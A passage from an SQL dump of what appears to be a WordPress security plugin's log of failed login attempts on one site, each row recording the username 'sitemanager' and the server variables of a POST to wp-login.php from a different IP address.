;s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745533192.2282691;s:12:\"REQUEST_TIME\";i:1745533192;}}','198.54.120.73',0,'2025-04-25 03:49:54','1970-01-01 00:00:00'),(94201,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48412\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745533576.6044869;s:12:\"REQUEST_TIME\";i:1745533576;}}','195.26.245.159',0,'2025-04-25 03:56:18','1970-01-01 00:00:00'),(94202,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55472\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.146.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745533964.599977;s:12:\"REQUEST_TIME\";i:1745533964;}}','66.29.146.29',0,'2025-04-25 04:02:46','1970-01-01 00:00:00'),(94203,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50590\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.120.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745534346.4521201;s:12:\"REQUEST_TIME\";i:1745534346;}}','176.126.120.71',0,'2025-04-25 04:09:08','1970-01-01 00:00:00'),(94204,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50200\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.73\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745534730.4562709;s:12:\"REQUEST_TIME\";i:1745534730;}}','198.54.120.73',0,'2025-04-25 04:15:32','1970-01-01 00:00:00'),(94205,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58016\";s:11:\"REMOTE_ADDR\";s:15:\"111.229.111.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745535122.343189;s:12:\"REQUEST_TIME\";i:1745535122;}}','111.229.111.163',0,'2025-04-25 04:22:04','1970-01-01 00:00:00'),(94206,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"26846\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745535507.6787369;s:12:\"REQUEST_TIME\";i:1745535507;}}','91.151.95.70',0,'2025-04-25 04:28:29','1970-01-01 00:00:00'),(94207,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41160\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745535894.034554;s:12:\"REQUEST_TIME\";i:1745535894;}}','198.54.126.98',0,'2025-04-25 04:34:55','1970-01-01 00:00:00'),(94208,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"23364\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.173.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745536281.4103241;s:12:\"REQUEST_TIME\";i:1745536281;}}','103.161.173.219',0,'2025-04-25 04:41:23','1970-01-01 00:00:00'),(94209,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33792\";s:11:\"REMOTE_ADDR\";s:14:\"15.188.117.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745537063.7170761;s:12:\"REQUEST_TIME\";i:1745537063;}}','15.188.117.207',0,'2025-04-25 04:54:25','1970-01-01 00:00:00'),(94210,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60516\";s:11:\"REMOTE_ADDR\";s:14:\"107.172.243.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745537451.6908281;s:12:\"REQUEST_TIME\";i:1745537451;}}','107.172.243.11',0,'2025-04-25 05:00:53','1970-01-01 00:00:00'),(94211,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 